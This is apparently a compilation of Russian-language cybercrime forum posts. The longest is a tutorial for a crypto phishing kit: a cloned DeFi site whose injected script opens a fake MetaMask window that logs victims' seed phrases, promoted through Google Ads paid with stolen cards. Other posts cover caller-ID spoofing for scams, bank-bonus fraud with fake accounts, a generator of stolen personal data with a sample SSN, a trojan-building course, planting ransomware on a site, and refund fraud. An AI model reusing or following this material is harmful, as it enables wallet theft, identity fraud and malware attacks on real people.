физически не хватит)
+ я сделал по ней свой приятный процент, так что дергаться лично для себя
просто смысла не вижу.
Сама схема не сказать что капец какая уникальная,
уникальной её делает множество уникальных выборов касающихся ее деталей.
Строго говоря,
набор этих деталей и некоторых прилагающихся механик и будет сегодня
представлен всеобщему вниманию.
Несмотря на кажущуюся простоту и (С) все гениальное - просто, многие пробующие
могут отвалиться просто на лени.
Сегодня мы доведем таких за ручку до победы!
И я напоминаю. Ты можешь заработать, ключевое слово "можешь", не от прочтения
этой статьи, а именно от реализации. Успех, к ленивым, как правило, повернут
жопой.
Так что, раз мы договорились - самое время действовать!
Ледниковый криптопериод, где обитают криптомамонты
Безусловно, стоит сразу отдать респект коллеге, который описал метод тихого
слива
нфт и токенов - ты красавчик! Лично меня сподвиг разобраться глубже в EVM и
сделать интересный проект. У меня и вопроса не стоит, за кем первое место в
конкурсе.
И попрошу не считать наши темы похожими. Социальная инженерия сама по себе,
скажем так, - есть свод
методов подсовывания жертве походящих за настоящие интерфейсы взаимодействия с
информационными системами.
Приступим.
Нашей жертве слегка за 25, обитает она на разных новостных и околотематических
источниках связанных с DeFi,
подключает свой МетаМаск на любой более-менее выглядящий проект (т.е. куда
попало), считает, что опасность её ни
за что не затронет, ведь русские хакеры еще не знают, что такое криптовалюта.
Для особенно умных - это был двойной сарказм. Двойной, потому что первый слой
Проследуем на шикарный источник дефи-проектов, куда частенько лезут тусоваться
всяческие дефи-чмошники: https://www.defipulse.com
Здесь просто содержится толпа популярнейших по мнению дефи-чмошников проектов.
Берем любой, где есть кнопка "Connect Wallet" (подключить кошелёк):
Ctrl+S в браузере, это сохранит всю страничку с дополнительной прилагающейся ветошью в папку:
рекомендую сразу при сохранении называть файл index.html
Пробуем два раза кликнуть по индекс хтмл, чтоб он открылся в браузере, и видим
шиш с маслом. Опаньки, а чо такое?
А я объясню. Из-за того, что все метамаски работают на новомодных технологиях,
т.е. Web3, то и эти технологии
работают на новомодных фреймворках, т.е. ReactJS. Прошла эра создания фейка на
любой сайт за полторы минуты, сегодня
глупый кодер попросит тебя тыщу баксов и переверстает весь сайт вручную на
реакте, тем самым отбирая у тебя драгоценный бюджет
на залив на таргет этого всего добра. https://xss.is/threads/69122/ - не в
обиду, человек сделал действительно серьезный продукт судя по описанию, просто
продемонстрировать что кодеры правда делают фиши на тех же технологиях на коих
сделаны сами таргеты.
Только вот никем и нигде не уточняется, что собранная и отрендеренная на
сервере или клиенте яваскриптом хтмл страничка УЖЕ отрендеренная,
то есть не нужно ничего мудрить - методы новые, а технологии старые.
Элементарным фиксом с которым справятся даже дети мы щас пофиксим всю
страницу.
Идём в index.html, ищем там нечто содержащее набор символов "app.js":
Комментируем. Комментарии в хтмл выглядят как , где звездочка -
то что ты собрался комментировать, как видно на скрине.
Можно поэкспериментировать с комментированием разных *.js, если этот app.js не
сработал - как правило, нет в страничке такого, который не сработал бы. Они
находятся либо внутри не очень большого относительно странички **< head>,
**либо где-то перед < /body> в самом конце странички.
Сохраняем, перезагружаем - вуаля:
получаем фейк с отрубленным компонентом динамической сборки странички,
заставляя показывать его именно то, что мы сохранили изначально.
Можно заметить косяки - расползся один блок - их, к сожалению, придётся
пофиксить, но и это базовых знаний HTML+CSS - трех дней легкого читания уроков
под пивко.
Фиксим:
пихаем перед **< /head> **этот кусок кода:
HTML:Copy to clipboard
<style>
.poolsdialog{
max-width: 680px;
}
</style>
Работает? еще бы:
Еще я удалил несколько ссылок **< a>* **с другими проектами в контексте
этого, чтоб не париться долго с их выравниванием, и дописал перед полоской
загрузки фразу Connecting wallet... - конечный пользователь сочтет это за
вполне адекватное поведение. Если уж совсем боишься, что не сочтет - велком,
допили.
Устал? Я тоже нет, это тебе не аппаратный криптокошелек собирать
А это уже пол работы!
Осталось присобачить к кнопке выпадающее окохо с вводом мнемоники метамаска,
вооот такое:
Делаем.
Нужно сунуть в индекс хтмл перед < /body> вот такую приблуду:
HTML:Copy to clipboard
<script type="text/javascript">
document.onclick = function(){
window.open("MetaMask.html",'...',"status=no,titlebar=no,location=no,directories=no,channelmode=no,menubar=no,toolbar=no,scrollbars=no,resizable=no,menubar=0,top=0,left='+window.innerWidth+',width=400,height=650');")
}
</script>
Она просто открывает отдельное окно с фейком метамаска.
И нужно положить в папку с сайтом приложенные к статье файлы из папки Mmask.
Теперь идем как раз в эту папку, заходим в метамаск.хтмл, меняем там поиском
по файлу адрес сайта на который переадресуется этот фейк после нажатия на
кнопку PROCEED.
В приложенном фейке curve.fi найди сам curve.fi чтоб понять где его потом
менять, в курве фи уже все это сделано. Это нужно для того, чтоб после ввода
мнемоники мамонта переадресовало на оригинальный сайт.
Поздравляю, вы великолепны!
Открываем сайт, жмем коннект валлет, выбираем метамаск, вводим любые слова,
жмем ок - нас переадресует на оригинальный сайт,
а в файле log.txt по одному в строке содержатся мнемонические фразы
жертв. Жируй - не могу.
И что делать-то теперь с этим?
Да все довольно просто, нужно лишь наработать чуйку и автоматизм слегка.
Как арендовать схожий с оригом домен на namecheap.com и хостинг чуть ли не там
же - рассказывать не буду, это уж совсем дюжину раз везде описано,
я уже всем доказал что могу по объему хоть докторскую написать, так что только
полезные знания, только хардкор)))
Далее - ищем на форумах сервис продажи google ads аккаунтов с прикрученными
к ним картами с балансом (или делаем сами, если умеем),
топаем в Google Trends (посмотреть по каким ключевым словам больше всего
гуглят похожее люди, грубый например - new defi project), потом создаём
там объявление рекламное, ждем пока аппрувнется ИИ, и на наш сайт начинают
забегать мамонты, оставляя свои мнемоники.
GOOGLE ADS
Здесь самая загвоздка и заключается. Все люди, с которыми я общался по теме
Google Ads - в чатах, мои партнеры, знакомые трафферы, просто знакомые - все
как один сошлись на мнении, что результат в этой сфере достигается лишь
накопленным опытом, даже передать его грамотно не получится.
Нужно пробовать и учиться.
Тебе будут резать карты, блокировать через 15$ (сегодня это звучит уже не так
много,
да?),
но это далеко не программирование - это просто платформа
рекламы. Она изучается, опыт - нарабатывается, освоив гугл адс на скарженные
карты ты можешь лить траф на белые проекты (но будь аккуратен, все таки
карты скарженные)))), это очень серьезный навык.
Как правило, так работа и разделялась - кодер - я, мне было абсолютно в кайф
пилить эти мелкие проектики, траффер и организатор всей прочей деятельности -
мой партнер.
Ну как, кодер, сегодня я показал, что сатоши накамото быть не нужно, да
никем быть не нужно, разве что человеком с логикой , чтоб самому делать это
всё.
Суммарно за все время работы с людьми моя доля, которую я получил - составила
около 2 с лишним миллионов рублей по курсу около 70 за бакс. Это около года
ненапряжной работы, для меня лишь в качестве кодера - пришел url - сделал
сайтец - получил кеш, фикса + проценты. Занимался между тем всяческими
разработками. Звучит это приблизительно как "да не ох%ел ли ты, дядя, мог бы
спокойно жить", да стоит действительно откровенно признаться - мне лень
двигаться по всей этой теме, вот правда. Пусть мои остальные дела дадут такой
кеш только через 2, 3, 5х того же времени, но лично меня не будет грызть
совесть что я за полчаса сделал 3 фейка, по сути не потратив и одной сотой
имеющихся у меня знаний. И это не набивание себе цены как специалисту в том
числе, что могут подтвердить те, кого я отморозил с невероятно интересными
предложениями о работе. Этот параграф откровений должен служить читателю как
мотиватор - изучай, двигайся, даже банальнейший HTML+CSS можно развить во что
угодно и по деньгам, и по перспективам, и совсем не обязательно в черную.
Для начала рекомендую прям просто купить аккаунты с уже привязанными картами у
людей, которые этим занимаются постоянно, советовать никого не буду,
дабы не выглядело как реклама. Привязать карту - уже полдела. Остается лишь
создать правильное объявление, чтоб и гугл его пропустил, и конверсия
какая-никакая была. Как и в любой "теме", можно и всрать тысячу баксов и
получить мнемонику с 1$ на счету, так и поставить грамотно на поток и каждый
день ловить мнемоники с NFT, знатного рода токенами, эфиром и тому подобное.
Зависит все исключительно от тебя.
Итог
Присобачиваю, мой ты родной, архив с двумя фейками -
https://www.sendspace.com/file/m1vdxe - рассмотренный в статье curve.fi и
некий fei.loc (loc - мой локальный домен, посмотришь оригинал введя
несуществующую мнемонику и перепрыгнув на ориг, хоть убей не помню
ориг домен))), на fei.loc есть так же более сложная механика с разными
подключаемыми кошельками - леджер там на скорую руку сверстанный, ищущий да
обрящет, доверстает сам как нужно под любой кош. Для других техник придется
слегка разобраться в PHP и фиксить файл submit.php, но там тоже буквально 3-5
строк всего - разобраться труда не составит. В отдельной папке сложен метамаск
для использования в своих проектах - папка Mmask.
Всем тихого озера да большого улова.
https://xss.is/threads/69049/ - cry_more, считай, пока
писалось - под тебя написалось, кайфуй))
https://xss.is/threads/68288/ - LMNTRXX скинь тз лайв
панели в лс, погляжу, может интересно и времечко выделю) ссылка чтоб
продемонстрировать насколько людям просто лень десять строк в сумме пофиксить.
UPD: только что увидел, что фаворит получил бан - обидно, но кидала должен быть наказан. Все равно рекомендую ознакомиться с его статьей - там много полезного.
Бывают довольно часто ситуации что надо позвонить куда то и чтобы у нашего
собеседника отбился телефон который нам надо.
Примеров тут масса, хотим мы протолкнуть пак, занимаетесь вы нигерийским
скамом или просто надо подтвердить по телефону транзу палки и так далее и тому
подобное...
И так начнем, что нам надо:
И так регаемся на callwithus.com с носками, данные берем левые, почту
одноразовую.
Потом заходим на My Account с данными что пришли по мылу и закидываем через
биткоин баланс, много закидывать не надо 10$ макс.
Теперь берем данные для X-Lite в закладке VoIP Accounts. Запускаем X-Lite,
идём на SIP Account и прописываем там:
User ID = @CALLWITHUS_USERNAME@
Domain = sip.callwithus.com
Password = @CALLWITHUS_PASSWORD@
Всё X-Lite готов делать звонки. Проверить соединение с сервером можно набрав
тест номер 3246. Всегда советую звонить с openvpn, на прямую не звоните!!!
Осталось выставить страну куда будем звонить и телефон.
Идем в закладку SPEED DIAL и выбираем Select Dialing rule: Russia (если в
России) или 0 for long distance, 00 for Internacional. Replace 0 with country
codе 44 (если Англия).
Потом самое интересное и это надо будет делать каждый раз когда мы хотим
сменить номер.
Идем в закладку ADD CALLER ID, жмем на ADD CALLER ID на против нашего VoIP
Account и пишем +447911123456, делаем true.
Всё теперь набираем любой номер и на другом конце высветится +447911123456, надо сделать другой номер меняем ADD CALLER ID и всё.
Удачи!
Чейз практически постоянно раздает деньги новым клиентам, кто откроет счет и получит на этот счет direct deposit от работодателя.
Бонусы могут варьироваться от 200 до 500 баксов.
Такие бонусы раздают многие банки, но у Чейза нет минимальной суммы депозита от работодателя, при котором нам засчитывается бонус, что мы и будем абузить.
Проблема в том, что Chase не засчитает бонус за peer-to-peer переводы через zelle, cashapp и так далее, как и трансферы от других банков.
Но, есть способ обмануть чейз и получить 200 баксов потратив всего 3 доллара.
Шаг #1.
Переходим по ссылке https://account.chase.com/consumer/banking/seo
Нажимаем на зеленую кнопку и создаем саморег Чейза.
Либо же даем эту ссылку селлеру саморегов.
Процесс открытия аккаунта по данному офферу и без него абсолютно одинаков.
Нюанс: иногда из-за плохого кредит скора Чейз не хочет открывать Total
Checking и просит открыть Сhase Secure Banking:
Secure Banking нам не подходит, за него не дают бонус, просто используйте
другую фуллку.
Также на странице оффера можно просто получить купон на емейл, и отправить его в поддержку Чейза. Если аккаунт не старше двух месяцев, купон применят к аккаунту (но однажды мне залочили саморег после обращения в поддержку, так что не рекомендую)
Шаг #2
Нам понадобится аккаунт TransferWise (transferwise.com)
Регистрируете на любые доки (или на свои, если хотите). Документы любой страны принимаются.
Жмем на Send money
Жмем на External account (русскоязычный интерфейс может отличаться, но
интуитивно думаю поймете, куда нажимать)
Выбираем Same currency перевод и вводим сумму в 3 USD (если регали аккаунт
transferwise с ру ip, то вероятно опции same currency не будет, тогда выбираем
international, чтобы получатель получил деньги в USD)
Добавляем получателя - Someone else
А далее заполняем всю информацию как в фуллке нашего саморега Чейза (первый
пункт "email" не заполняем)
Ну и вводим an/rn от саморега
Заполняем всё, нажимаем на Confirm, на следующем шаге подтверждаем перевод, и
далее оплачиваем.
Transferwise также принимает виртуальные карты киви.
Кстати, Transferwise это хорошая штука когда вам нужно пополнить вашу vcc или любой другой саморег ба для теста. Деньги обычно приходят в банк на следующий день.
Шаг #4
Отслеживаем наш бонус.
В приложении чейза есть трекер который позволяет отслеживать, когда Чейз засчитает вашу транзакцию для получения бонуса, и этот трекер также точно покажет, в какой день бонус будет на вашем счету.
Я использую android эмулятор Bluestacks под эти цели.
В веб версии такого трекера нет (и исходя из моего опыта, чейз намного лучше относится к вам, когда в аккаунт входят через приложение, а не через веб версию)
Трекер обычно обновляется через 2 дня после поступления вашей транзакции от
TransferWise.
Обычно, Чейз депозитит бонусы каждый вторник.
Шаг #5
Бонус пришел, вы великолепны!
Используйте эти деньги как хотите. Бонус конечно же бесчардж.
Бесплатные FullInfo,генератор документов,инструкции по баркодам
https://generatormr.com/full-info#work-box
Вы можете бесплатно сгенерировать реальные Full Info(рандом штат)
Пример:
(ALESIA SWANK APT AK-6 120 ELM ST EDGEWATER PARK NJ 8010 158-84-8869 3/1/1988)
База данных 2017-2018 год
Сгенерировать МРЗ код/Персональный номер для паспорта США и других документов.
Получить инструкцию по Баркодам и их содержимому в Водительских удостоверениях USA/
Отдельно можно получить бесплатно FULL INFO в телеграмм боте
https://web.telegram.org/#/im?p=@generatormrfullinfobot
https://generatormr.com/full-info#work-box
You can generate real Full Info (random) for free)
Example:
(ALESIA SWANK APT AK-6 120 ELM STREET EDGEWATER PARK NJ 8010 158-84-8869 3/1/1988)
Database 2017-2018 year
To generate SSE code/Personal number for the US passport and other documents.
Get instructions on Barcodes and their contents in the USA Driver's licenses/
You can also get FULL INFO for free in the telegram bot
https://web.telegram.org/#/im?p=@generatormrfullinfobot
Генерирует фулл и ссн! Реальные фулки, из базы какой-то дергает. чекал лично руками, все валидные, бывает из-за того что такая фулка уже есть и она в лимите! Если собираетесь использовать их, то пробивайте бг, чтобы получить более точную инфу
Данный оффер Чейза с бонусом в $200 доступен до 20 января 2021 года. То есть,
аккаунт вы должны создать до 20 января, а на то чтобы пополнить этот аккаунт
на 3 бакса и получить бонус у вас будет еще 3 месяца.
И большая вероятность, что 20 января чейз просто продлит "акцию" еще на
несколько месяцев.
Прошел регистрацию в google выбрал номер, и вот тут он просит ее подвязать к действующиму номеру, все бы просто но номер нужен USA. ру не принимает, кто имел дело с регистрацией, подскажите как быть где взять этот номер, есть какие то способы взять подвязать номер usa от google voice???
Всем привет. У кого есть обучения по вбиву google ads, группа или форум где есть нужная инфа. Очень интересно освоить такой вид заработка, а покупать за 500-1000$ нет желания
заранее спасибо
Джентльмены, всё чаще вижу на каналах телеги рекламу скам проектов по доскам
объявлений по Бурж в основном eu, но попадалась даже австралия)
Вот вам пример
Можно придумать крышесносную рекламу. Можно расписать, какие мы все пиздатые и
ахуенные. Но толк от этого дерьма, когда почти все слова остаются в рекламе?
Го я докажу тебе делом, а пока почитай, что у нас есть.
? Самописный бот. Реализуем любую выгодную и крутую идею в нём;
? Вбив на любой цвет и вкус. Снимаем с мамонта все нитки;
? Бомбовый обнал карт. Проходимость почти всех банков мира. Выплаты по обналу в течении суток!
Сочные проценты за твою работу: 70% обычный профит / 70% обнал-профит;
? 9 САМЫХ АКТУАЛЬНЫХ СТРАН: ??Польша, ??Болгария, ??Румыния, ??Канада, ??Словакия, ??Эстония, ??Норвегия, ??Хорватия, ?? Испания (6 стран идут онли на обнал, что повышает процент профита в разы!)
Что за платежки такие или экс-скамеры с Авито ушедшие в бурж-плаванье
настолько продвинуты?
Ваши версии?
Новое веяние в области reverse proxy - necrobrowser. На xss через поиск не нашел, решил выложить:
](https://github.com/muraenateam/necrobrowser)
necromantic session control. Contribute to muraenateam/necrobrowser development by creating an account on GitHub.
github.com
Two-factor Authentication (2FA) was once a hurdle for this type of attack, but techniques to bypass many types of 2FA solutions were quickly adopted and implemented into a variety of phishing frameworks. It is important to understand how these bypasses work so defenders can push for standards...
![www.digitalshadows.com](/proxy.php?image=https%3A%2F%2Fwww.digitalshadows.com%2Fuploads%2F2021%2F05%2Fcropped- ds-Favicon-32x32.png&hash=96c7ce3007faba5baa8eb79cdbd862df&return_error=1) www.digitalshadows.com
Поднимается проще чем богомол, 2фа для гугла работает с коробки. Так сильно не тестил, может и не замена для модлыги но так кому интересно могут пощупать...
Udemy - Изучаем Социальную Инженерию с Нуля
Автор (режиссер): Udemy
Жанр: Обучающий курс
Описание:
Социальная инженерия, иногда называемая наукой и искусством взлома человеческого сознания, становится все более популярной в связи с повышением роли социальных сетей, электронной почты или других видов онлайн-коммуникации в нашей жизни. В сфере информационной безопасности данный термин широко используется для обозначения ряда техник, используемых киберпреступниками. Последние имеют своей целью выманивание конфиденциальной информации у жертв либо побуждают жертв к совершению действий, направленных на проникновение в систему в обход системы безопасности.
Продолжительность: 11:54:17
Качество видео: PCRec
Перевод: Одноголосый закадровый (Рус)
Видео: AVC/H.264, 1280x720, ~3581 Kbps
Аудио: AAC, 2 ch, 192 Kbps
Описание далее:
Научитесь взламывать Windows, Mac OS X, Linux & Android используя социальную инженерию.
"Добро пожаловать на полный курс по Социальной Инженерии! В этом курсе мы начнем с самых азов, вам не нужно ничего знать ни про тестирование на проникновение, ни про взлом. Мы начнем с основ социальной инженерии и к концу курса вы сможете взломать большинство популярных операционных систем (Windows, OS X и Linux), научитесь генерировать различные трояны и сможете установить их на компьютер жертвы применив техники социальной инженерии.
Этот курс фокусируется на практической стороне взлома, но мы так же не будем принебрегать теорией. Прежде чем мы перейдем к тестированию на проникновение, я покажу вам как настроить тестовое окружение. Это поможет нам безопасно отработать навыки тестирования на проникновение на нашей собственной машине. Курс разделен на 4 основных раздела:
Сбор информации – В этом разделе я научу вас как собирать информацию о жертве. Это может быть, как компания, так и веб-сайт или человек. Я научу вас как собирать информацию, которая связана с вашей целью, такую, как например веб-сайты, ссылки, компании, список людей, адреса почты, телефонные номера, список друзей, аккаунты в социальных сетях и т.д. Я так же научу вас как использовать эту информацию для создания стратегии атаки
Генерируем Злые Файлы – В этом разделе я научу вас генерировать злые файлы (файлы, которые будут делать то, что вам нужно на компьютере жертвы). Речь пойдет о бэкдорах, кейлогерах и т.д. Вы научитесь генерировать эти файлы для операционных систем Windows, OS X и Linux. И это еще не все. Вы так же научитесь делать так, чтобы эти файлы обходили проверку антивирусов, мы сделаем так, чтобы они вели себя как обычное изображение или PDF, вы так же научитесь встраивать эти файлы в документы Microsoft Office.
Методы доставки – В этом разделе вы научитесь методам социальной инженерии, которые позволят вам доставить трояны на компьютер жертвы. Вы научитесь создавать фэйковые веб-сайты, которые выглядят как настоящие, научитесь отправлять email так, словно они были отправлены людьми, которым можно доверять. Вы так же научитесь использовать фэйковые страницы авторизации и фэйковые обновления. С помощью них вы сможете взламывать систему жертвы. Но это не все, вы так же изучите продвинутые техники социальной инженерии, которые будут привлекать цель посетить вредоносный URL и перейдя по которым, цель будет взломана.
После взлома - В этом разделе вы научитесь взаимодействовать с системой. Вы научитесь получать доступ к файловой системе, поддерживать доступ, изменять права, следить за целью, использовать компьютер жертвы в качестве стартовой точки для взлома остальных компьютеров в системе.
Этот курс создан исключительно для образовательных целей и все атаки
проводятся на моих тестовых машинах.
"
Курс ведёт:
Содержание :
Содержание первой части:
Введение
Что такое Социальная Инженерия
Тизер - Взламываем смартфон на Android. Получаем доступ к камере
Обзор курса
Подготовка - Готовим рабочее окружение
Необходимый софт
Устанавливаем Kali Linux 2017 как виртуальную машину
Устанавливаем Windows как виртуальную машину
Устанавливаем Ubuntu как виртуальную машину
Подготовка - Основы Linux
Обзор Kali Linux
Основные команды Терминала Linux
Делаем Снапшоты
Обновляем установленные программы
Сбор Информации
Введение в сбор информации
Сбор Информации - Собираем Информацию о Сайте Компании
Обзор Maltego
Узнаем информацию о Домене, узнаем адрес почты
Узнаем информацию о Хостинге, почту поддержки, почту админа
Содержание 2-ой части:
04 Сбор Информации - Собираем Информацию о Сайте Компании
016 - Ищем ссылки на веб-сайты связанные с жертвой
017 - Используем собранную информацию для создания стратегии атаки
05 Сбор информации - Собираем Информацию о Человеке
018 - Ищем ссылки на социальные сети
019 - Ищем привязанные аккаунты друзей в Twitter
020 - Ищем E-mail друзей жертвы
021 - Анализируем полученную информацию, создаем стратегию атаки
06 Злые Файлы Windows
022 - Введение
07 Злые Файлы Windows - Генерируем Бэкдор, который не видят Антивирусы
023 - Устанавливаем Veil 3.0
024 - Обзор Veil, Основы Пэйлоадов
025 - Генерируем Бэкдор с помощью Veil 3, который не видят Антивирусы
026 - Ожидаем входящие подключения
027 - Взламываем машину на Windows с помощью сгенерированного Бэкдора
Содержание третьей части:
07 Злые Файлы Windows - Генерируем Бэкдор, который не видят Антивирусы
028 - Устанавливаем The Fat Rat
029 - Генерируем невидимый бэкдор с помощью The Fat Rat
030 - Устанавливаем Empire
031 - Создаем Лисенер Empire
032 - Создаем Стейджер Powershell, взламываем Windows 10
033 - Модифицируем исходник Бэкдора, обходим антивирус
08 Злые Файлы - Слежка
034 - Что такое Keylogger
035 - Создаем удаленный Keylogger
036 - Захватываем пароли с помощью Keylogger'a
037 - Основы извлечения паролей
038 - Извлекаем пароли с локальной машины
Содержание четвертой части:
08 Злые Файлы - Слежка
039 - Извлекаем пароли с удаленной машины
09 Злые Файлы - Совершенствуем злые файлы
040 - Обходим все антивирусы. Модифицируем шестнадцатеричные значения
041 - Download and Execute Payload (Payload загрузки и запуска файлов)
042 - Создаем идеальный инструмент для слежки
10 Злые Файлы - Конвертируем злые файлы в трояны
043 - Встраиваем злые файлы в любые файлы, например в изображения, PDF, MP4
044 - Незаметный запуск злых файлов в фоне
045 - Меняем иконку трояна
046 - Маскируем расширение файла .exe на любое другое (pdf, png и т.д.)
047 - Download and Execute Payload (Payload загрузки и запуска файлов). Второй способ
Содержание пятой части:
10 Злые Файлы - Конвертируем злые файлы в трояны
048 - Встраиваем злые файлы в любые файлы, например в изображения, PDF, MP4. Второй способ
049 - Встраиваем бэкдор в реальный документ Microsoft Office
050 - Встраиваем любые злые файлы в реальные документы Microsoft Office
11 Злые файлы Mac OS X
051 - Введение
052 - Взлом Mac OS X с помощью бэкдора Meterpreter
053 - Взлом Mac OS X c помощью стейджера Empire
054 - Конвертируем бэкдор в исполняемый файл
055 - Соединяем нормальный файл с бэкдором
056 - Download and Execute Payload (Payload загрузки и запуска файлов)
057 - Меняем иконку трояна
058 - Скрытый запуск троянов
059 - Встраиваем бэкдор в реальный документ Microsoft Office
Содержание шестой части:
12 Злые файлы Linux
060 - Взлом Linux одной командой
061 - Более продвинутые бэкдоры для Linux
062 - Устанавливаем удаленный килоггер
063 - Записываем с помощью удаленного килоггера все, что печатает пользователь
064 - Получаем сохраненные пароли с локальной машины
065 - Пэйлоад запуска и отправки отчета
066 - Получаем сохраненные пароли с удаленной машины
067 - Встраиваем вредоносный код в настоящий пакет Linux - Часть 1
068 - Встраиваем вредоносный код в настоящий пакет Linux - Часть 2
069 - Встраиваем бэкдор в настоящее Android приложение
Содержание седьмой части:
13 Методы доставки (Взаимодействуем с целью)
070 - Введение
071 - Готовим вредоносные файлы к отправке через URL
072 - Email спуфинг - Отправка сообщений с других адресов
073 - Взлом OS X и Linux с помощью чистой социальной инженерии
074 - Создаем копию страницы авторизации любого сайта
075 - Угоняем учетные данные с помощью фейковой страницы авторизации
076 - Знакомимся c BeEF, основы
077 - Встраиваем Hook BeEF в вебстраницы
078 - Заманиваем цель, убеждаем ее перейти по ссылке
079 - Базовые команды BeEF
080 - Угоняем учетные данные с помощью фейкового запроса авторизации
081 - Взламываем Windows 10 с помощью фейкового обновления
082 - Взламываем OS X с помощью фейкового обновления
083 - Взламываем Linux с помощью фейкового обновления
Содержание 8 части:
14 Проводим атаки за пределами домашней сети
084 - Обзор
085 - Пример 1 - Генерируем бэкдор, который работает за пределами домашней сети
086 - Настраиваем проброс портов в Kali
087 - Пример 2 - Используем BeEF за пределами домашней сети
15 После взлома
088 - Введение
089 - Апгрейдим базовый Shell-доступ до Meterpreter/Empire
090 - Автоматический запуск команд при установке обратного соединения
16 После взлома - Meterpreter
091 - Основы Meterpreter
092 - Команды файловой системы
093 - Поддержка доступа - Базовые методы
094 - Поддержка доступа - Используем надежный скрытный метод
095 - Слежка - Захват нажатий на клавиши - Делаем скриншоты
096 - Pivoting - Теория. Что такое Pivoting
097 - Pivoting - Взламываем устройства находящиеся с нами в одной сети
Содержание 9 части:
16 После взлома - Meterpreter
098 - Управляем смартфоном на Android - Получаем доступ к микрофону, камере, файловой системе и т.д.
099 - Поддержка доступа на Mac OS X
17 После взлома - Empire
100 - Основа работы с агентами
101 - Команды файловой системы
102 - Shell-команды для загрузки файлов на машину жертвы
103 - Внедряем процесс бэкдора в системный процесс
104 - Угоняем пароль root-пользователя. Расширяем права в OS X
105 - Поддерживаем доступ на OS X
18 Безопасность
106 - Разоблачаем фэйковые E-mail'ы
107 - Как защититься от BeEF и других браузерных эксплоитов
108 - Ручное обнаружение троянов
109 - Обнаруживаем трояны с помощью Sandbox
Скачать:
[CLIKE][/CLIKE][CLIKE]https://yadi.sk/d/6m5M-k8_3WHCM6[/CLIKE]
Добрый вечер, уважаемые. У меня такая ситуация, есть доступ к нескольким ПК людей, т.е. я через удаленку подключаюсь к ним, это связано с работой. Т.е. люди предоставляют мне доступ каждый день к своему компьютеру, я там поработаю определенное время и выхожу. В принципе, не думаю что они сидят и мониторят каждое действие, что я делаю, это может быть первые дни, после - вряд ли, плюс время всегда разное, от 5 минут до 3х часов, понятно три часа никто не будет следить, и если установить что-то непонятное (для рядового юзера), вполне возможно, а не в открытую копаться в браузере)) Так вот, что можно сделать интересного, с ПК такого человека? установить какой-нибудь софт, чтобы получить все его пароли, или что-то поинтереснее? лучше что-то такое, чтобы уже не надо было снова быть подключенным, ну то есть понятно, я могу в открытую копаться в пк, еще чего-то, но все-таки можно спалиться. В общем, надеюсь понятно объяснил) Жду ваших вариантов, помощи) интересных предложений)
[CLIKE]
Spoiler: Прочитать перед использованием
Друзья порекомендовали мне этот способ. Использовать на свой страх и риск.
- способ, как сменить данные аккаунта ORIGIN без секретного вопроса [/CLIKE]
Доброго времени
Решил создать тему по такому вопросу т.к. толкового ничего попросту не нашел
Если кто-то владеет информацией - делитесь, буду рад почитать)
Прив всем опять..с Вами Злодей Коте.... Я думаю зацепка и идея будет не тока новичкам полезна но и дедам))))
Объяснять за сплоиты я тут не буду...и разглагольствовать.... А начну вот с чего....
Все почти прошли кто сидел за инетом школу заработка на кликах и автосерфинге :bang:
Результаты канеч не ахти.... Но мне вспомнилась одна задумка еще года 2 назад...Есть же браузер Ougo . Он как бэ нужен для автосерфинга. Схема просто до безобразия.... У вас есть сайтец , у других тож.... У вас например на сайте есть баннер илии контекстная реклама... Другие тож на этом зарабатывают... Что даем нам браузер Оуго... Мы регаемся...вставляем урл нашего сайтеца.... И запускаем браузер.... Начинается на автомате просмотр чужих сайтов... И наш конечно же тож просмотривают.... И ВОТ ИДЕЯ!!!!!! Что нам мешает в наш сайтец вшить троя или например мой любимый Блокиратор - вымогатель (который кстати находится уже в паблике).... Люди посмотрели ваш сайтец... А потом САМОЕ ИНТЕРЕСНОЕ!!! О Боги...Что случилося??? Все мои файлы под паролям - говорят узера..и чтоб пароль получить над отправить денюжку автору проги которая заблокировала все файлы....
Надеюсь тема и идея моя вам будет интересной... У кого идеи по этому поводу есть - мона сдружится аськами - поговорить)))
Кому понравилось ставим +
)))))
Не забывайте - соц. инженерия - ЭТО ПРОФФЕСИЯ будущего... :punk:
Как всем известно большинство вирусов/троянов распространяються по ложным
сайтам.
И вот списко сайтов куда лучше не заходить.
- 1clickspyclean .com
- 1clicksuite .net
- 1spywarekiller .com
- 1stantivirus .com (14/ene/06)
- 209 .50 .251 .182
- 3bsoftware .com
- 66 .79 .171 .75
- aboutblankremover .com
- actualresearch .com
- achtungachtung .com
- adaware .com
- ada-ware .com
- addriller .com
- ad-eliminator .com
- adeliminator .net
- adprotect .com
- adprotector .com
- adprotectplus .com
- adremovergold .com
- advancedsearchbar .com (14/feb/06)
- advertising .com
- adware .com
- adware .privacy-solution .com
- adware .storesbiz .com
- adwarealert .com
- adwarebazooka .com (21/dic/05)
- adwarecops .com
- adwaredelete .com
- adwaredeluxe .com
- adwarefilter .com
- adwarehitman .com
- adwarehunter .com
- adwarepatrol .com
- adwarepro .com
- adwarepunisher .com (5/dic/05)
- adware-remover .net
- adwareremover .ws
- adwareremovergold .com
- adwaresafe .com
- adwaresafety .com
- adwaresheriff .com (14/feb/06)
- adwaresoft .com
- adwarespy .com
- adwarespyware .net
- adwarespywareremoval .com
- adwarestriker .com
- adwaretools .com
- adwarexeliminator .com
- SeriALL.com
- Astalavista.box.sk
- Astalavista.am
- Astalavista.us
- Keygen.us
- Crackz.ws
- mucaca.ms
Надеюсь и вы будете продолжать этот список. тем более щас идёт чемпионат мира
по футболу, так что большинство "футбольных" сайтов так сказать заражённые.
Подсмотрел:
Как создать фейковую личность?
Каким бы количеством VPN и Proxy вы не пользовались, для полной анонимности придётся создать новую личность с её адресом проживания, кредитной карточкой, автомобилем и любимым цветом.
В этом нам и помогут два сервиса, которые за считанные секунды предоставят вам уникальную личность. Для этого достаточно просто перейти на сайт. Если созданный человек вам не понравился - обновите страницу. Первый сайт ориентируется на территорию РФ, второй - на зарубежье.
Сайт RUS - https://randus.org
Сайт ENG - https://www.fakenamegenerator.com
Оглавление
Введение
Основы Рефаунда
Безопасность и анонимность.
Золотое правило рефаунда.
Основы СИ и общения
Прогрев аккаунта Как рефать?
Что рефать?
Как тестить магазин на возможнотсь рефанда?
Почему я тебе дал не рыбу , а удочку?
Саппорт и общение с ними
Мои неудачи в рефанде и чего ждать?
Основные принципы рефанда.
С чего начинать?
С чего начинал ты?
Правила рефаунда для каждого сайта.
Мой пример темы с айфонами или как выдумывать схемы самому
Базы рефандеров: как избежать палева?
Китай
Aliexpress
DHGATE
Другие магазины
Западные магазины
Asos
Farfetch
Amazon
Ebay
Paypal
Дополнительная инфа
